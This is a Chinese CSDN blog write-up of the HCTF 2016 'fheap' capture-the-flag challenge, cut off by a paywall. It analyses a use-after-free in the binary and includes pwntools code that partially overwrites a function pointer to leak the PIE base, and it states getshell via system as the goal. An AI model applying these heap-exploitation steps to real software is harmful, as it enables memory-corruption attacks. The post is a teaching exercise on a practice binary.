2016 hctf fheap

最新推荐文章于 2021-08-21 22:33:37 发布
最新推荐文章于 2021-08-21 22:33:37 发布
阅读量495 收藏
点赞数 2
分类专栏: PWN 文章标签: pwn ctf hctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33438733/article/details/117777154
版权
本文详细介绍了在2016年HCTF中遇到的一道关于fheap的题目,重点讨论了未初始化的Use-After-Free(UAF)漏洞。通过IDA分析数据结构,揭示了程序中的问题,如未清零指针导致的删除节点后仍可访问。接着,解释了如何利用这个漏洞,通过构造堆块溢出到函数指针区域,执行puts函数泄露程序基址。最后,讨论了通过格式化字符串漏洞泄漏libc基址并实现getshell的方法,强调理解程序数据结构和思路的重要性。
摘要由CSDN通过智能技术生成

前言

好久没写东西了,本想着简单记录一下,不过在做这题的时候,弄懂了之前困扰许多的问题,所以就多写一些吧,在此感谢俺的女票@曙雀

UAF

IDA分析后,得到数据结构如下。

note:

00000000 note            struc ; (sizeof=0x20, mappedto_9)
00000000 content_ptr     dq ?
00000008 field_8         dq ?
00000010 str_size        dd ?
00000014 field_14        dd ?
00000018 func            dq ?                    ; offset
00000020 note            ends

note_chunk:

00000000 note_chunk      struc ; (sizeof=0x10, mappedto_8)
00000000                                         ; XREF: .bss:stru_2020C0/r
00000000 in_use          dd ?
00000004 field_4         dd ?
00000008 note_ptr        dq ?
00000010 note_chunk      ends

如图所示:

1

note结构体中需要声明func变量为函数指针。

函数指针的C语言格式为typedef int (*func_ptr)(int,int),结合上下文

设置nodefunc变量的类型为void (*func)(struct note *)

设置note_chunknote_ptr变量的类型为note *note_ptr

现在程序中相关的数据结构已经分析清楚,需要对代码进行进一步的分析。

程序主要有createdelete两个函数:

delete函数:

2

首先【1】处没有将note_chunk中的note_ptr指针清零,其次对note进行free后,也未将note结构体中的数据进行清零,【2】处结合【1】处,从而可以随意delete已经删除的节点。

create函数:

在这里插入图片描述

通过构造合适大小的堆块(要知道实际chunk的大小和申请的大小不一定是一样的,final_chunk_mem_size=0x20),通过【3】溢出到note的func部分的后几个字节,使之变成puts函数,构造puts(note)从而泄漏出程序运行基址。

这部分的思路如下:
create(p, 0x30, "1"*0x30)
create(p, 0x30, "2"*0x30)
delete(p, 1)
delete(p, 0)
# [0] leak real_base_addr
# overlapping puts_off = 0x990 chunk  1/16 0x?990
# debug("b *{:#X}\nb *{:#X}\nc 5".format(create_addr, call_eax_addr))
# debug()
create(p, 0x20, b"b"*0x18+p16(0x4990)+b"\x00")
delete(p, 1)
real_base_addr = u64(p.recvuntil(
"\x0a")[-7:-1].ljust(8, b'\x00')) - elf.plt["puts"]
success("real_base_addr ==> {:#x}".format(real_base_addr))
printf_addr = real_base_addr + elf.plt["printf"]
success("printf_addr ==> {:#x}".format(printf_addr))
delete(p, 0)

目前我们已经具备了写堆块,并执行相关函数的能力,我们的最终的目的是执行system('/bin/bash'),但是目前我们仅绕过了PIE获取到了程序加载的基地址,还无法获取lib

最低0.47元/天 解锁文章
坚强的女程序员
关注
专栏目录
初探UAF漏洞:2016 HCTF fheap
Vicl1fe的博客
09-21 931
参考链接:CTF_wiki 讨论qq群:946220807,欢迎大佬来指导 UAF 刚学堆,学到了UAF(use after free)漏洞,UAF本质是free后,并没有把指针指向null,导致free后,指针还可被使用。用2016 HCTF fheap来说明一下。题目也在参考链接里。 分析 看到这个程序实现了3个功能,add note,delete not,print note。 在add_...
HCTF 2016 fheap
Bill
03-11 2104
HCTF 2016 fheap 一. 源码 fheap.c 二. 题目分析 1. 程序的生成 假设我们的源码文件名叫做fheap.c gcc fheap.c -pie -fpic -o fheap strip fheap 其中-fpic是辅助-pie, 没有-fpic将会编译失败. strip是去除符号表(Discard symbols from obje...
hctf2016-fheap
钞sir的博客
03-28 1万+
题目地址:https://github.com/zh-explorer/hctf2016-fheap 程序简介 程序中只有3个功能,一个create,一个delete然后一个quit: +++++++++++++++++++++++++++ So, let's crash the world +++++++++++++++++++++++++++ 1.create string 2.delete ...
2016 hctf fheap 题解
abc380620175的博客
03-27 545
题目链接 https://github.com/zh-explorer/hctf2016-fheap 题目分析 题目功能只有 malloc 和 free 的功能,查看堆的布局: 全局指针没有置空,导致 uaf 和 double free 漏洞,两种都可以做,但是这题的重点是绕过 PIE。 double free 完了之后,会导致下面的情况 这里需要注意一下 create 函数的...
hctf2016_fheap(partial write)
seaaseesa的博客
06-10 573
hctf2016_fheap 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,add函数中,如果字符串长度大于15,则单独malloc一块内存存放字符串,否则直接存结点里。 Delete功能没有清空指针,因此,存在UAF, 我们可以第字节将节点里的free代理函数指针修改掉,利用低字节覆盖,使其指向printf函数plt表,这样,当我们用UAF去delete这个堆时,就会调用printf,这样我们可以利用格式化字符串去泄露数据。然后就可以利用UAF,去执行system函数了。
2016hctf writeup
Aurora的博客
03-04 3288
MISC杂项签到 http://139.224.54.27/webco1a/+_+.pcapng 用wireshark打开流量包,追踪TCP流,发现是一个webshell的流量,看到webshell控制端查看了远程服务器上的两个关键文件:function.py和flag cat function.py: #!/usr/bin/env python # coding:utf-8 __au
2016hctf Writeup.md
Ni9htMar3的博客
12-05 1万+
第一次和同学以战队MiRag3参加XCTF联赛,经验不足,技术较弱,以后会加倍努力~!留个爪纪念一下~~WEB2099年的flag直接burpsuit截断,修改消息请求头如下:直接得到flagRESTFUL这里主要考察的是RESTFUL格式 index.php/参数/值 然后根据提示只要put money 大于 12450即可兵者多诡题目说明为上传图片,首先上传一个图片试试。点击上传图片,发现u
2016HCTF giligili writeup
nidalaowo的专栏
11-30 1819
题目网址:http://re4js.hctf.io/         本题主要考察js及编程基本知识,包括js函数、进制转换、异或等。         打开网页看到一张gif图片,并听到那首非常有名的神曲,下面有个输入框,写着hctf{xxxxxx},点上去可以输入内容,但一回车就显示“Sorry,you are wrong...” 按惯例先打开源码,看到下面的一段js代码,答案就全在里
hctf2016_fheap
qq_53062301的博客
07-30 236
看的第二道堆题目,也调试和想了很久,学了很多东西,这道题也是一道uaf,从create函数中可以看到,如果申请的chunk>0xF就会申请两个chunk,其中一个是malloc(0x20),另一个是malloc(size),如果申请的chunk<0xF时,距离chunk头0x28的地方会存放着free函数的指针,可供用户自己输入的位置是距离chunk头0x10的位置,当delete时就会调用这个指针函数,题目本身也只有create和delete这两个可用功能,checksec发现题目开启了PIE
hctf2016 fheap学习(FreeBuf发表的官方解法)
weixin_30664615的博客
12-10 188
目录 如何在二次释放前修改函数指针 修改函数指针流程 如何获得进程的加载基址 puts函数的调用 如何获取system函数地址 说一下用DlyELF函数 如何调用system函数 ROP需要的栈布局 read函数的妙用 参数”/bin/sh”如何传递过去 参考...
hctf2016 fheap学习(FlappyPig队伍的解法)
weixin_30498807的博客
12-10 162
目录 漏洞原理 二次释放 如何在第二次释放前修改函数地址 fastbin的特性 修改函数指针流程 如何获得进程的加载基址 格式化字符串漏洞 确定printf函数在代码段中偏移 printf函数输出想要的地址 如何获得system函数的地址 寻找一个被fheap...
HCTF 2016 fheap 做题笔记
fa1c4的blog
08-21 529
前言 一道UAF题, HCTF 2016 - fheap ctfhub搜fheap 过程 __int64 __fastcall main(int a1, char **a2, char **a3) { char buf[1032]; // [rsp+0h] [rbp-410h] BYREF unsigned __int64 v5; // [rsp+408h] [rbp-8h] v5 = __readfsqword(0x28u); setbuf(stdout, 0LL); setbu
hctf2016[pwn]-fheap
CharlesGodX的博客
03-30 1739
0x00:前言 这道题是一道堆栈混合加格式化字符串的题目,题目的利用点不错,很适合好好做一遍。 0x01:题目链接 https://github.com/zh-explorer/hctf2016-fheap 0x02:解题思路 首先查看程序保护 root@Thunder_J-virtual-machine:~/桌面# checksec pwn-f [*] Checking for new vers...
Heap Spray原理浅析
热门推荐
magictong的专栏
03-24 3万+
Heap Spray原理浅析 Magictong 2012/03   摘要:本文主要介绍Heap Spray的基本原理和特点、以及防范技术。 关键词:Heap Spray、溢出攻击、漏洞利用、堆溢出   Heap Spray定义基本描述 Heap Spray并没有一个官方的正式定义,毕竟这是漏洞攻击技术的一部分。但是我们可以根据它的特点自己来简单总结一下。Heap Spray是在sh
hctf[pwn] the-end
九层台
11-12 2024
void __fastcall __noreturn main(__int64 a1, char **a2, char **a3) { signed int i; // [rsp+4h] [rbp-Ch] void *buf; // [rsp+8h] [rbp-8h] sleep(0); printf(&quot;here is a gift %p, good luck ;)\n&quot;, &amp;a...
hctf2016 web 部分WriteUp.md
Bendawang's Blog
11-28 4798
hctf2016 web 部分WriteUp
【C++ STL应用与实现】72: 标准库里的堆--如何使用标准库的heap算法
Small Flows
11-29 5001
本文介绍如何使用STL里的heap(堆)算法。第一次接触heap这种数据结构是在大学的数据结构教材上,它是一棵完全二叉树。在STL中,heap是算法的形式提供给我们使用的。包括下面几个函数: make_heap: 根据指定的迭代器区间以及一个可选的比较函数,来创建一个heap push_heap: 把指定区间的最后一个元素插入到heap中 pop_heap: 弹出heap顶元素, 将其放置于区间末尾
斐波那契堆的实现和比较(相对二项堆)
ljsspace的专栏
09-05 1万+
Fibonacci Heap(简称F-Heap)是一种基于二项堆的非常灵活的数据结构。它与二项堆不同的地方在于: 1)root list和任何结点的child list使用双向循环链表,而且这些lists中的结点不再有先后次序(Binomial Heap中root list的根
hctf2016-杂项签到
最新发布
12-16
hctf2016-杂项签到是指在2016年举办的hctf比赛中,需要完成的杂项签到题目。这些题目通常是一些简单的密码或者编码类题目,旨在检测选手对常见密码学和编码知识的掌握程度。 比如,有可能会给出一串经过base64编码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值